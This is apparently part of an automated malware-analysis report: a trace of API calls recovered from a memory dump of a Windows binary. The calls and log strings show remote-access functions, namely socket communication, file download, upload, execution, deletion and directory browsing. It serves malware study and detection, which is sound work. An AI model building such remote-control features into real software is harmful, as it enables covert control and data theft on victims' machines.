                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404202
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 00404223
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040422D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404237
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040424C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040427E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040428B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040429F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 004042AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004042C2
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                        • closesocket.WS2_32(?), ref: 0040433A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                        • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                        • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,69D65DF8,00000001,00000000), ref: 00404489
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                        • _wrename.MSVCRT ref: 004044C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                          • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                          • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                          • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                        • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                        • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,69D65DF8,?,?,?,?,?,00000055), ref: 004046AC
                                        • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                          • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                          • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                          • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                        • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
